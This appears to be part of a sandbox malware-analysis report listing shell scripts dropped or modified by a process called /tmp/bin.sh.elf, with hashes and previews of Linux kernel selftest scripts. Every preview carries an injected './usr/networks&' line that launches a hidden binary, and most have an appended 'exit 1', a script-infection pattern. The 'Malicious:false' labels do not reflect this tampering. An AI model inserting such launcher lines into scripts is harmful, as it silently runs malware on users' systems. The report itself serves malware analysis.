                                                                  SSDEEP:96:plMw5r4X2+JC+F0112mpdNo1F0JyuclvZYCXmp99F01145Rmmpd8U4c76EBgB3qE:plP5HyG6QcUrTpr9c9qXgXeYWpbXfXh0
                                                                  MD5:DB3D15135543C92A59182516B05220DA
                                                                  SHA1:97D47FA6E4ED35EDC4D696879AC6C413437807CD
                                                                  SHA-256:20EE7F91469500AA440CBC16382B6B247DF6BF25B3062A50CDDB336305DA35C9
                                                                  SHA-512:B4D3369752599489BC7CC698580615857FAB45B8B1FA855E62EB0A26E260B78505BBB0920E0324D8C1252A62F354AA4C6D0936EA918DC2F8F41A81D76E362A80
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# set global exit status, but never reset nonzero one..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..cleanup() {..local -r jobs="$(jobs -p)"..local -r ns="$(ip netns list|grep $PEER_NS)"...[ -n "${jobs}" ] && kill -1 ${jobs} 2>/dev/null..[ -n "$ns" ] && ip netns del $ns 2>/dev/null.}.trap cleanup EXIT..cfg_veth() {..ip netns add "${PEER_NS}"..ip -netns "${PEER_NS}" link set lo up..ip link add type veth..ip link set dev veth0 up..ip addr add dev veth0 192.168.1.2/24..ip addr add dev veth0 2001:db8::2/64 nodad...ip link set dev veth1 netns "${PEER_NS}"..ip -netns "${PEER_NS}" addr add dev veth1 192.168.1.1/24..ip -netns "${PEER_NS}" addr add dev veth1 2001:db8::1/64 nodad..ip -netns "${PEER_NS}" link set dev veth1 up..ip -n "${PEER_NS}" link set veth1 xdp object ../bpf/xdp_dummy.o section xdp_dummy.}..run_one() {..# use 'rx' as separator between sender args and receiver args..local -r all="$@"..local -r tx_args=${all%rx*}..local -r rx_args=${all#*rx}...cfg_veth..
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):167
                                                                  Entropy (8bit):4.694318956835895
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaBMAG2FVFUFrOrJhidYYY6X/AF1GtP88YK76MLg0LC1jDXVOORgn:LhVlhiTXX/A7lK76Kr2NMn
                                                                  MD5:D06578C3F54C37737723D227F5A79A73
                                                                  SHA1:B4FFDEA60E2C90C9C9F29C57BADF2CB22F4ACBCD
                                                                  SHA-256:8EDB5712A96D724B1A85C888EE66221059A1E5EB79F81F3789A05461488CE667
                                                                  SHA-512:7C1FA97A41C1A27891F2E43E6D7D3ABB88BF3B13540E3D1A22E8E3CE6F182A6059E46EF563B8D6330F7773646231FC11FC5D5E126FC704EB6F176016DC35D957
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit -1.fi..if [[ $# -eq 0 ]]; then..run_all.elif [[ $1 == "__subprocess" ]]; then..shift..run_one $@.else..run_in_netns $@.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2151
                                                                  Entropy (8bit):5.261578154191124
                                                                  Encrypted:false
                                                                  SSDEEP:48:wdh6P+cigZGpRFcXe35Pmhs/VSKKPQhw4bqMDSH8K3ZMiFyiu:s6P+cij+Xe0F4O4eMu5dNu
                                                                  MD5:10DFDD7A55089A036920280CDDBA5BD1
                                                                  SHA1:48ED095C8FA4B83E51E14A3E2A6037AAE4AFC92D
                                                                  SHA-256:A431152B32EB648D990F0EC1378859E969EA4FD29BF906F1053B15E5646FACF4
                                                                  SHA-512:09F6F953329565B60537D579F245D1B588C990C2740DB793D7D6AF11E1315A524443EACBC41D748FEE6936AAAB5453337B7F93A54CC9FD82C4A2550FE26EA3C4
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.kselftest_test_exitcode() {..local -r exitcode=$1...if [[ ${exitcode} -eq ${KSFT_PASS} ]]; then...num_pass=$(( $num_pass + 1 ))..elif [[ ${exitcode} -eq ${KSFT_SKIP} ]]; then...num_skip=$(( $num_skip + 1 ))..else...num_err=$(( $num_err + 1 ))..fi.}..kselftest_exit() {..echo -e "$(basename $0): PASS=${num_pass} SKIP=${num_skip} FAIL=${num_err}"...if [[ $num_err -ne 0 ]]; then...echo -e "$(basename $0): ${RED}FAIL${NC}"...exit ${KSFT_FAIL}..fi...if [[ $num_skip -ne 0 ]]; then...echo -e "$(basename $0): ${YELLOW}SKIP${NC}"...exit ${KSFT_SKIP}..fi...echo -e "$(basename $0): ${GREEN}PASS${NC}"..exit ${KSFT_PASS}.}..wake_children() {..local -r jobs="$(jobs -p)"...if [[ "${jobs}" != "" ]]; then...kill -1 ${jobs} 2>/dev/null..fi.}.trap wake_children EXIT..run_one() {..local -r args=$@..../udpgso_bench_rx &.../udpgso_bench_rx -t &..../udpgso_bench_tx ${args}.}..run_in_netns() {..local -r args=$@..../in_netns.sh $0 __subprocess ${args}..kselftest_test_exitcode $?.}..run_udp() {..
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):7692
                                                                  Entropy (8bit):5.076292397526648
                                                                  Encrypted:false
                                                                  SSDEEP:192:ujRQNQ6TpjT0TNJPSoXHyHSnA8A2DPiXeymgC:u36UPiX0gC
                                                                  MD5:EC62E99FBDF27537E608D7238EC09262
                                                                  SHA1:A5E2021688DA3FF89736841FC3FA5B6363280F37
                                                                  SHA-256:01FE9D1FF4970B2D8A86E820A4514852581AA8C45C19C821872CEB151C79AFF9
                                                                  SHA-512:11C9B295798FBD7EBD691CF0A006857CC33388938D015EE6AA14CBF9C632CA8ECFF65207DB170E31B487B612349870062E7218CAB6F6DCDDF3F885F94F1FCBFD
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....exit 0...elif [ x"$c" = x ]; then....echo "ERROR: No counters"....ret=1....exit 111...else....exit 1...fi..).}..check_xfrm() {..# 0: iptables -m policy rule count == 0..# 1: iptables -m policy rule count != 0..rval=$1..ip=$2..local lret=0...ip netns exec ns1 ping -q -c 1 10.0.2.$ip > /dev/null...check_ipt_policy_count ns3..if [ $? -ne $rval ] ; then...lret=1..fi..check_ipt_policy_count ns4..if [ $? -ne $rval ] ; then...lret=1..fi...ip netns exec ns2 ping -q -c 1 10.0.1.$ip > /dev/null...check_ipt_policy_count ns3..if [ $? -ne $rval ] ; then...lret=1..fi..check_ipt_policy_count ns4..if [ $? -ne $rval ] ; then...lret=1..fi...return $lret.}..check_exceptions().{..logpostfix="$1"..local lret=0...# ping to .254 should be excluded from the tunnel (exception is in place)...check_xfrm 0 254..if [ $? -ne 0 ]; then...echo "FAIL: expected ping to .254 to fail ($logpostfix)"...lret=1..else...echo "PASS: ping to .254 bypassed ipsec tunnel ($logpostfix)"..fi...# ping to .253 shoul
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3636
                                                                  Entropy (8bit):4.929082746023161
                                                                  Encrypted:false
                                                                  SSDEEP:96:vt9Z1NPWAzvCkqWb3o4f+1bD4otWzUD81bZ1FI92Wr:Hs5XKQ1bD4uyU41bLFI92C
                                                                  MD5:66A4827A56BD561933E2CD68ED1D5667
                                                                  SHA1:46885F18DA976030D9866102505F99E78FC52013
                                                                  SHA-256:5FC4BCFD5D1FD4F2677CDA8385118F8AA52B2AA99A08CFB70EBD282B4B82F123
                                                                  SHA-512:17EEA69BC464219FAEC241AA97F6A41A064D13413EDDC04CA3FE792FA3941E122C8CE1EA8946092C8996A07F63103E963F03A7FEC8E07A7213D28D294E8B9E15
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..ip netns add ns0.ip netns add ns1.ip netns add ns2..ip link add veth0 netns ns0 type veth peer name eth0 netns ns1.if [ $? -ne 0 ]; then..echo "SKIP: Can't create veth device"..exit $ksft_skip.fi.ip link add veth1 netns ns0 type veth peer name eth0 netns ns2..ip -net ns0 link set lo up.ip -net ns0 link set veth0 up.ip -net ns0 link set veth1 up..ip -net ns0 link add br0 type bridge.if [ $? -ne 0 ]; then..echo "SKIP: Can't create bridge br0"..exit $ksft_skip.fi..ip -net ns0 link set veth0 master br0.ip -net ns0 link set veth1 master br0.ip -net ns0 link set br0 up.ip -net ns0 addr add 10.0.0.1/24 dev br0..# place both in same subnet, ns1 and ns2 connected via ns0:br0.for i in 1 2; do. ip -net ns$i link set lo up. ip -net ns$i link set eth0 up. ip -net ns$i addr add 10.0.0.1$i/24 dev eth0.done..test_ebtables_broute().{..local cipt
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):6622
                                                                  Entropy (8bit):4.91579619605947
                                                                  Encrypted:false
                                                                  SSDEEP:96:vZ7CPUMjBgqgxCXlulvNbpOZx9bFPpM5q2UqJtgHUWEBOviujpADpAJg0HH/WR46:2JJ+hUDHUzBEjpADpAfHuos
                                                                  MD5:5E544700755CD6FED0B8A72B23D78EB2
                                                                  SHA1:8FC99822C2E197DD641D4785BC406A63C7B88998
                                                                  SHA-256:A71032EA3EBFAC3F5A14B22D6E5B2E79CAC7A89A1A39FA932214DF05A5E1B2E7
                                                                  SHA-512:73F74BDA01D6ACE01066512D2C6D817CEDBC13EA3214A6467FBD50817E868CD74B2B049E93BE3BCBB1BD174B8D3DC6FA8F3AB18A3DB92A608E70DD2715F82179
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..cleanup() {..for i in 1 2;do ip netns del nsclient$i;done..for i in 1 2;do ip netns del nsrouter$i;done.}..ipv4() {. echo -n 192.168.$1.2.}..ipv6 () {. echo -n dead:$1::2.}..check_counter().{..ns=$1..name=$2..expect=$3..local lret=0...cnt=$(ip netns exec $ns nft list counter inet filter "$name" | grep -q "$expect")..if [ $? -ne 0 ]; then...echo "ERROR: counter $name in $ns has unexpected value (expected $expect)" 1>&2...ip netns exec $ns nft list counter inet filter "$name" 1>&2...lret=1..fi...return $lret.}..check_unknown().{..expect="packets 0 bytes 0"..for n in nsclient1 nsclient2 nsrouter1 nsrouter2; do...check_counter $n "unknown" "$expect"...if [ $? -ne 0 ] ;then....return 1...fi..done...return 0.}..for n in nsclient1 nsclient2 nsrouter1 nsrouter2; do. ip netns add $n. ip -net $n link set lo up.done..DEV=veth0.ip link
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):9104
                                                                  Entropy (8bit):4.993956144361954
                                                                  Encrypted:false
                                                                  SSDEEP:192:8WtZYzpcq5LETzC1QjgdykepWAgWyzUgJyASkKQSyrer:LAyOdykRWyDJyGner
                                                                  MD5:3B3A3BA397804C48A47D092CF3BD7B3C
                                                                  SHA1:4A1511BBE56343B7D955290FE420E1196B248AA3
                                                                  SHA-256:A7583B71512F4C76A592BEF41C12DBD8B2090AB9B88FA10719757C4F4D80AFDC
                                                                  SHA-512:17477BEEFEFA2F96D1F183ABFDD4E3D4F956864F452F4BC566F3F46A0C876D01DED6C80D498AE127811A0ED1185AD69F81DA5ADFDD358FEBE1A2487B0AF80824
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..which nc > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without nc (netcat)"..exit $ksft_skip.fi..ip netns add nsr1.if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace"..exit $ksft_skip.fi..ip netns add ns1.ip netns add ns2..ip netns add nsr2..cleanup() {..for i in 1 2; do...ip netns del ns$i...ip netns del nsr$i..done...rm -f "$ns1in" "$ns1out"..rm -f "$ns2in" "$ns2out"...[ $log_netns -eq 0 ] && sysctl -q net.netfilter.nf_log_all_netns=$log_netns.}..trap cleanup EXIT..sysctl -q net.netfilter.nf_log_all_netns=1..ip link add veth0 netns nsr1 type veth peer name eth0 netns ns1.ip link add veth1 netns nsr1 type veth peer name veth0 netns nsr2..ip link add veth1 netns nsr2 type veth peer name eth0 netns ns2..for dev in lo veth0 veth1; do. for i in 1 2; do. ip -net nsr$i link set $dev up. done.do
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):21529
                                                                  Entropy (8bit):4.944841471342032
                                                                  Encrypted:false
                                                                  SSDEEP:192:8MnpSIYJQ3jmb6cC/pAQ+bavzarpAQuPIUFdRlVOqKWRrLud9di+w0EJ40vl5KDD:8FsQdi+w0040N5K/
                                                                  MD5:1FD676FA6690E761EF1A76EB1A08EBDC
                                                                  SHA1:38DB532AAE0CDBE6D9DB363266A5AFEFA679436C
                                                                  SHA-256:E2B8767EF667EC952B86C445B087D1A5F2494A08E4E9345F7413EEF5323B5837
                                                                  SHA-512:E415DDC72BDE994DF60138563F617FB674A310F3776DEB09E1DD7B6A583D4A1928B72890794BDFFE9E4774D4998DB701634D8602FBC7FC71BF75998383C3D2F2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..ip netns add "$ns0".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns0"..exit $ksft_skip.fi..trap cleanup EXIT..ip netns add "$ns1".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns1"..exit $ksft_skip.fi..ip netns add "$ns2".if [ $? -ne 0 ];then..echo "SKIP: Could not create net namespace $ns2"..exit $ksft_skip.fi..ip link add veth0 netns "$ns0" type veth peer name eth0 netns "$ns1" > /dev/null 2>&1.if [ $? -ne 0 ];then. echo "SKIP: No virtual ethernet pair device support in kernel". exit $ksft_skip.fi.ip link add veth1 netns "$ns0" type veth peer name eth0 netns "$ns2"..ip -net "$ns0" link set lo up.ip -net "$ns0" link set veth0 up.ip -net "$ns0" addr add 10.0.1.1/24 dev veth0.ip -net "$ns0" addr add dead:1::1/64 dev veth0..ip -net "$ns0" link set veth1 up.ip -net "$ns0" addr add 10.0.2.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1506
                                                                  Entropy (8bit):5.015913062594834
                                                                  Encrypted:false
                                                                  SSDEEP:24:wK81nFnUenSen3izLx5zLxKfN7wUv4ydmufT8X9/C/XWrgWeqZD9Eu/A9wj:vQnFD9Sz/z09pv4x6oX9lgZqHE+A9A
                                                                  MD5:6838568F3F4859EAF69385064BBE4C8B
                                                                  SHA1:CBAD50C89D792DD100CA08E2AE9B0798D6D5E68E
                                                                  SHA-256:BB56D10B4E73554C91F138E4E3A0A0C377D1E684C9B435032FCE25A08184B0B9
                                                                  SHA-512:790CA81D1498CC5411C124307E48BF4FD778EFFB2EC9328A0B9AD2C0CCA4F2C74D4872AF768E7C4D480799AAF6EFEECDBD281709269861183895181DAF13C8AB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..ip -Version > /dev/null 2>&1.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without ip tool"..exit $ksft_skip.fi..tmp=$(mktemp)..for table in $tables; do..echo add table inet "$table" >> "$tmp"..echo flush table inet "$table" >> "$tmp"...echo "add chain inet $table INPUT { type filter hook input priority 0; }" >> "$tmp"..echo "add chain inet $table OUTPUT { type filter hook output priority 0; }" >> "$tmp"..for c in $(seq 1 400); do...chain=$(printf "chain%03u" "$c")...echo "add chain inet $table $chain" >> "$tmp"..done...for c in $(seq 1 400); do...chain=$(printf "chain%03u" "$c")...for BASE in INPUT OUTPUT; do....echo "add rule inet $table $BASE counter jump $chain" >> "$tmp"...done...echo "add rule inet $table $chain counter return" >> "$tmp"..done.done..ip netns add "$testns".ip -netns "$testns" link set lo up..lscpu | grep ^CPU\(s\): | ( read cpu cpunum ;.cpunum=$((cpunum-1)).for i in $(seq 0 $cpunum);do..mask=$(printf 0x%x $((1<<$i))).
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11276
                                                                  Entropy (8bit):5.481780874362443
                                                                  Encrypted:false
                                                                  SSDEEP:192:oxDgsOvsSFyeLy0KBhKWhht8J5S/Y6pJd893YeAQILa1DbAuUIJDeex7:sDgsOPLuhBr/23BZIW5QeN
                                                                  MD5:D704E5F5EA3C647ED057513B91E63912
                                                                  SHA1:938A32825B0FAB4074A06E41063AA6F4A5A43F0E
                                                                  SHA-256:8C1E2070D7A4B8EC686C7BB3C1F47504A37779D2910E3113BBD5CDF17E2C7F2E
                                                                  SHA-512:74BE734ACF94A06063A9961DD1EBC03709C7DB5DFA0BD8C37A5E83F999CA9167B00DEEAB17795C472EEDE472E31094787E7489C5105F53F168F4048E9B46A393
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..echo " -C don't cleanup ntb modules on exit"..echo " -h show this help message"..echo " -l list available local and remote PCI ids"..echo " -r REMOTE_HOST specify the remote's hostname to connect"..echo " to for the test (using ssh)"..echo " -m MW_SIZE memory window size for ntb_tool"..echo " (default: $MW_SIZE)"..echo " -d run dma tests for ntb_perf"..echo " -p ORDER total data order for ntb_perf"..echo " (default: $PERF_RUN_ORDER)"..echo " -w MAX_MW_SIZE maxmium memory window size for ntb_perf"..echo.}..function parse_args().{..OPTIND=0..while getopts "b:Cdhlm:r:p:w:" opt; do...case "$opt" in...C) DONT_CLEANUP=1 ;;...d) RUN_DMA_TESTS=1 ;;...h) show_help; exit 0 ;;...l) LIST_DEVS=TRUE ;;...m) MW_SIZE=${OPTARG} ;;...r) REMOTE_HOST=${OPTARG} ;;...p) PERF_RUN_ORDER=${OPTARG} ;;...w) MAX_MW_SIZE=${OPTARG} ;;...\?)... echo "Invalid option:
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2139
                                                                  Entropy (8bit):5.010147811831499
                                                                  Encrypted:false
                                                                  SSDEEP:48:z5WLypbyFmW+cNFV7VhRkcxxAlxOVAcN0CCGH8:rpbA7VhRk8UaAjCC+8
                                                                  MD5:BFB55229CC292549DDFC7412E29BE715
                                                                  SHA1:BC6A50A6CB491893D1AFEBD63E8DA5A554183DFB
                                                                  SHA-256:B6DCC9E346F07819CBFDF2B697A5D0039DBA97D1E2DC4641FA90070F035C1568
                                                                  SHA-512:3B33CE04BE3512FB7E4E995657A60BB9A45D1CA0ABA695910EC1B2FBC1620E4BFD2A5B16D33AFCC33D0F457E0B852C0ED6A0A8B1B18E77643FA16BFAC51CDD33
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $KSELFTESTS_SKIP;.fi..if [ ! -e "/sys/kernel/debug/powerpc/eeh_dev_check" ] && \. [ ! -e "/sys/kernel/debug/powerpc/eeh_dev_break" ] ; then..echo "debugfs EEH testing files are missing. Is debugfs mounted?"..exit $KSELFTESTS_SKIP;.fi..pre_lspci=`mktemp`.lspci > $pre_lspci..# Bump the max freeze count to something absurd so we don't.# trip over it while breaking things..echo 5000 > /sys/kernel/debug/powerpc/eeh_max_freezes..# record the devices that we break in here. Assuming everything.# goes to plan we should get them back once the recover process.# is finished..devices=""..# Build up a list of candidate devices..for dev in `ls -1 /sys/bus/pci/devices/ | grep '\.0$'` ; do..# skip bridges since we can't recover them (yet...)..if [ -e "/sys/bus/pci/devices/$dev/pci_bus" ] ; then...echo "$dev, Skipped: bridge"...continue;..fi...# Skip VFs for now since we don't have a reliable way..# to break them...if [ -e "/sys/bus/pci/devices/$dev/physfn" ] ; then...echo "$dev,
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1985
                                                                  Entropy (8bit):5.1971922094030125
                                                                  Encrypted:false
                                                                  SSDEEP:48:rJDTmqUGoPRkFI6qUCjl4zXlfenS2xLz4:NmqSWFdzCgfenZs
                                                                  MD5:E22F86E80F1475933EE643B1098BB0BD
                                                                  SHA1:8AAB18EF3307CD428D30B6791D7E12B1CD1EEA14
                                                                  SHA-256:3FB64720524F18C23DCCD9056E2E9E4800E01B8D1616E436786534A0B077E152
                                                                  SHA-512:5BE1C828675CD3441606B1EE23A8C144327F160806C9AB1FC45C714351B72CE744AEFE7336901E0A9A6BD2E6D5BFBE7647A0A774D00BE3E3296C5CBAD7413206
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# We will get 8 HMI events per injection.# todo: deal with things being offline.expected_hmis=8.COUNT_HMIS() {. dmesg | grep -c 'Harmless Hypervisor Maintenance interrupt'.}..# massively expand snooze delay, allowing injection on all cores.ppc64_cpu --smt-snooze-delay=1000000000..# when we exit, restore it.trap "ppc64_cpu --smt-snooze-delay=100" 0 1..# for each chip+core combination.# todo - less fragile parsing.egrep -o 'OCC: Chip [0-9a-f]+ Core [0-9a-f]' < /sys/firmware/opal/msglog |.while read chipcore; do..chip=$(echo "$chipcore"|awk '{print $3}')..core=$(echo "$chipcore"|awk '{print $5}')..fir="0x1${core}013100"...# verify that Core FIR is zero as expected..if [ "$($GETSCOM -c 0x${chip} $fir)" != 0 ]; then...echo "FIR was not zero before injection for chip $chip, core $core. Aborting!"...echo "Result of $GETSCOM -c 0x${chip} $fir:"...$GETSCOM -c 0x${chip} $fir...echo "If you get a -5 error, the core may be in idle state. Try stress-ng."...echo "Other
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2153
                                                                  Entropy (8bit):5.195891220663769
                                                                  Encrypted:false
                                                                  SSDEEP:48:Kms2v0mGH+R5+l5dSu5hXflU4UeI8e/RERaGMuMEUTYLgW:NRtd8rlIt/ojLME+1W
                                                                  MD5:CEACB7A95D1C9705B086257F0B93BB4B
                                                                  SHA1:59936D2AEB984E1FBF1528311C23667612AFC979
                                                                  SHA-256:A09669A12D0556484AC42456FD565059D79E3178286FA8D8EAA519BFEDC6CC2A
                                                                  SHA-512:E20DC728490F76E787D38CBB5652E1EA292E25C20A9E93605F51E90198205940FDB76AE299A3C1073AAD294F449471DD1FA25707BC05716B60E16465CE0EB33B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..if [[ "$DEV" == "" ]]; then..echo "SKIP: PTP device not provided"..exit 0.fi..require_command().{..local cmd=$1; shift...if [[ ! -x "$(command -v "$cmd")" ]]; then...echo "SKIP: $cmd not installed"...exit 1..fi.}..phc_sanity().{..phc_ctl $DEV get &> /dev/null...if [ $? != 0 ]; then...echo "SKIP: unknown clock $DEV: No such device"...exit 1..fi.}..require_command phc_ctl.phc_sanity..##############################################################################.# Helpers..# Exit status to return at the end. Set in case one of the tests fails..EXIT_STATUS=0.# Per-test return value. Clear at the beginning of each test..RET=0..check_err().{..local err=$1...if [[ $RET -eq 0 && $err -ne 0 ]]; then...RET=$err..fi.}..log_test().{..local test_name=$1...if [[ $RET -ne 0 ]]; then...EXIT_STATUS=1...printf "TEST: %-60s [FAIL]\n" "$test_name"...return 1..fi...printf "TEST: %-60s [ OK ]\n" "$test_name"..return 0.}..tests_run().{..local current_test...for current_test in $
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):248
                                                                  Entropy (8bit):5.301131600273597
                                                                  Encrypted:false
                                                                  SSDEEP:6:Laq4bs4hJS6aYwJr3S6aYhNuS6aY5s/wRi0cLNQPn:msh6a3lC6ayh6anYo6n
                                                                  MD5:67AA2EFE0481FCDEB4895BD7E89D3D5C
                                                                  SHA1:9F38A80D6996FE3523B556B3914501C39264C62A
                                                                  SHA-256:952C4011DF7444FED43B6E2789DA36FE87257AF734F5D7FBFB527B196DDB9EC8
                                                                  SHA-512:3DEEECEF62BE7A50E2341F4F91FB310B00CE3EF5CCECC6B7AD687C924CD23B9DFAB72E0E94C2170AD178B4CA159B840A13E33E19F500A355B8A29E6CA38F0162
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit -1.fi.if grep -q '^CONFIG_SMP=n$' $cf.then..echo 1..exit 0.fi.if grep -q '^CONFIG_NR_CPUS=' $cf.then..grep '^CONFIG_NR_CPUS=' $cf | ...sed -e 's/^CONFIG_NR_CPUS=\([0-9]*\).*$/\1/'..exit 0.fi.cpus2use.sh../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):418
                                                                  Entropy (8bit):5.023825716215056
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vIe116vI4U8XXDM8qVRkW0qleOl3wcBn:rIe0dJDDxWvQOxwcB
                                                                  MD5:095294D70B3D26E07BA652BD30078A35
                                                                  SHA1:645C54D9E7FFB75E37C41B0963B76F0B227E0764
                                                                  SHA-256:DC6740540B21B0623A98A40A65D125501C4B952BB8F0E0C30A6C36348FEAFF7C
                                                                  SHA-512:4964AFB942DF134B89A066F768B9272675DCEE258BCE3A12D0F9E835AF146CAEA9CB7B22FE3D15D697972A5381A5E057F880F124B799110C37D387D41D94AB79
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..override=$2.if test -r $override.then..:.else..echo Override file $override unreadable!!!..exit 1.fi..T=${TMPDIR-/tmp}/config_override.sh.$$.trap 'rm -rf $T' 0.mkdir $T..sed < $override -e 's/^/grep -v "/' -e 's/=.*$/="/' |..awk '..{...if (last)....print last " |";...last = $0;..}..END {...if (last)....print last;..}' > $T/script.sh $T/script < $base.cat $override../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
